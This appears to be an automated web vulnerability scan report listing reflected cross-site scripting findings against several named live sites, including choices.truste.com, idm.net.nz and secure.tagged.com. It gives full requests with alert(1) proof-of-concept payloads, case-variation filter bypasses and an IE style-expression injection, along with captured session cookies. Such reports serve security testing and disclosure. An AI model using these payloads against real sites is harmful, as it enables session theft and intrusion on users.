Origin: http://www.orcon.net.nz

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=96d24ac1-dc06-4ffd-bfff-d8434693a51e3I5070; expires=Sat, 13-Aug-2011 13:23:24 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=128&WMPV=4922e
f6434b7c936
; expires=Sat, 13-Aug-2011 13: 23:24 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 15 May 2011 17:23:24 GMT
Connection: close
Content-Length: 0


4. Cross-site scripting (reflected)  previous  next
There are 62 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload f4061<script>alert(1)</script>d96264b56bd was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061<script>alert(1)</script>d96264b56bd&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:37:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 5088

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;
   
   truste.ts = null; //initi
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att01cont1f4061<script>alert(1)</script>d96264b56bd_ib = '<div id="te-clr1-att01cont1f4061<script>
...[SNIP]...

4.2. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload f28c9<ScRiPt>alert(1)</ScRiPt>ff74d1ef95b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250f28c9<ScRiPt>alert(1)</ScRiPt>ff74d1ef95b&c=att01cont1&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:36:48 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3778

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
_att01cont1_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att01",pid:"mec01",zindex:"10002",cam:"2",cid:"0311m300x250f28c9<ScRiPt>alert(1)</ScRiPt>ff74d1ef95b"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att01cont1_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choi
...[SNIP]...

4.3. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1cc71<ScRiPt>alert(1)</ScRiPt>3f620325c6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr&1cc71<ScRiPt>alert(1)</ScRiPt>3f620325c6f=1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:37:46 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3740

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
a=te_clr1_att01cont1_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choicesj.truste.com/ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr&1cc71<ScRiPt>alert(1)</ScRiPt>3f620325c6f=1&js=2";
document.body.appendChild(c);truste.defjsload=true}truste.ca.addBinding(te_clr1_att01cont1_bi)});

4.4. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload eccb0<ScRiPt>alert(1)</ScRiPt>f728d6512ce was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=treccb0<ScRiPt>alert(1)</ScRiPt>f728d6512ce HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:37:31 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3778

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
</div>\n';
var te_clr1_att01cont1_bi={baseName:"te-clr1-att01cont1",anchName:"te-clr1-att01cont1-anch",width:300,height:250,ox:0,oy:0,plc:"treccb0<ScRiPt>alert(1)</ScRiPt>f728d6512ce",iplc:"rel",intDivName:"te-clr1-att01cont1-itl",iconSpanId:"te-clr1-att01cont1-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att01cont1",noticeBaseUrl:"/camsg?",irBaseUrl:"/c
...[SNIP]...

4.5. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 3d817<ScRiPt>alert(1)</ScRiPt>1f0b57a0a54 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=100023d817<ScRiPt>alert(1)</ScRiPt>1f0b57a0a54&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/285818429/direct;wi.300;hi.250/01/1815717854?click=http://r1-ads.ace.advertising.com/click/site=0000705487/mnum=0000958688/cstr=43626829=_4dd01d04,1815717854,705487^958688^1183^0,1_/xsxdata=$XSXDATA/bnum=43626829/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:37:25 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3778

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
uste.ca.hideoverlay(te_clr1_att01cont1_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att01",pid:"mec01",zindex:"100023d817<ScRiPt>alert(1)</ScRiPt>1f0b57a0a54",cam:"2",cid:"0311m300x250"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att01cont1_bi;
if(!truste.defjsload){var c=document.createElement("
...[SNIP]...

4.6. https://console.iservices.net.nz/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://console.iservices.net.nz
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d729d"><script>alert(1)</script>1478c083729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d729d"><script>alert(1)</script>1478c083729=1 HTTP/1.1
Host: console.iservices.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 17:33:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.0
Set-Cookie: ISERVICES_SESSID=ITTEbbftfdQKVOjeNFZcc8YO4shpEO9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...
<input type="hidden" name="d729d"><script>alert(1)</script>1478c083729" value="1" />
...[SNIP]...

4.7. https://idm.net.nz/secure/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idm.net.nz
Path:   /secure/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3076"><script>alert(1)</script>6b7dcefb176 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure/?d3076"><script>alert(1)</script>6b7dcefb176=1 HTTP/1.1
Host: idm.net.nz
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:42:08 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8230

<html>
<head>
<title>IDM Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>

...[SNIP]...
<input name="Referrer" type="hidden" value="https://idm.net.nz/secure/?d3076"><script>alert(1)</script>6b7dcefb176=1">
...[SNIP]...

4.8. https://idm.net.nz/secure/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idm.net.nz
Path:   /secure/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f8a3"><script>alert(1)</script>54d864ce6a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure/index.php?9f8a3"><script>alert(1)</script>54d864ce6a8=1 HTTP/1.1
Host: idm.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:51:40 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8239

<html>
<head>
<title>IDM Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>

...[SNIP]...
<input name="Referrer" type="hidden" value="https://idm.net.nz/secure/index.php?9f8a3"><script>alert(1)</script>54d864ce6a8=1">
...[SNIP]...

4.9. https://secure.tagged.com/secure_login.html [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d343b"><script>alert(1)</script>cccd7a141af was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure_login.html?ver=2&loc=en_USd343b"><script>alert(1)</script>cccd7a141af&uri=http%3A%2F%2Fwww.tagged.com&display=full HTTP/1.1
Host: secure.tagged.com
Connection: keep-alive
Referer: https://secure.tagged.com/register.html?display=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:44:21 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2301

<!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"-->
<html>
<head>

<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dy
...[SNIP]...
<form id="login_form" action="https://secure.tagged.com/secure_login.html?ver=2&loc=en_USd343b"><script>alert(1)</script>cccd7a141af&uri=http%3A%2F%2Fwww.tagged.com&display=full" method="POST" name="login">
...[SNIP]...

4.10. https://secure.tagged.com/secure_login.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b883"><script>alert(1)</script>868fc1f78e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883"><script>alert(1)</script>868fc1f78e0=1 HTTP/1.1
Host: secure.tagged.com
Connection: keep-alive
Referer: https://secure.tagged.com/register.html?display=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:45:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2109

<!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"-->
<html>
<head>

<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dy
...[SNIP]...
<form id="login_form" action="https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883"><script>alert(1)</script>868fc1f78e0=1" method="POST" name="login">
...[SNIP]...

4.11. https://secure.tagged.com/secure_login.html [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae18e"><script>alert(1)</script>bd5fd72fb4f was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.comae18e"><script>alert(1)</script>bd5fd72fb4f&display=full HTTP/1.1
Host: secure.tagged.com
Connection: keep-alive
Referer: https://secure.tagged.com/register.html?display=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:44:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2301

<!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"-->
<html>
<head>

<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dy
...[SNIP]...
<form id="login_form" action="https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.comae18e"><script>alert(1)</script>bd5fd72fb4f&display=full" method="POST" name="login">
...[SNIP]...

4.12. https://secure.tagged.com/secure_login.html [ver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The value of the ver request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd03"><script>alert(1)</script>c5012c1ae01 was submitted in the ver parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /secure_login.html?ver=22dd03"><script>alert(1)</script>c5012c1ae01&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full HTTP/1.1
Host: secure.tagged.com
Connection: keep-alive
Referer: https://secure.tagged.com/register.html?display=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:44:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2301

<!-- DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"-->
<html>
<head>

<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dy
...[SNIP]...
<form id="login_form" action="https://secure.tagged.com/secure_login.html?ver=22dd03"><script>alert(1)</script>c5012c1ae01&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full" method="POST" name="login">
...[SNIP]...

4.13. http://tweetbeat.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tweetbeat.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 79ae7'%20style%3dx%3aexpression(alert(1))%20e9cde0e431c was submitted in the REST URL parameter 1. This input was echoed as 79ae7' style=x:expression(alert(1)) e9cde0e431c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /79ae7'%20style%3dx%3aexpression(alert(1))%20e9cde0e431c HTTP/1.1
Host: tweetbeat.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
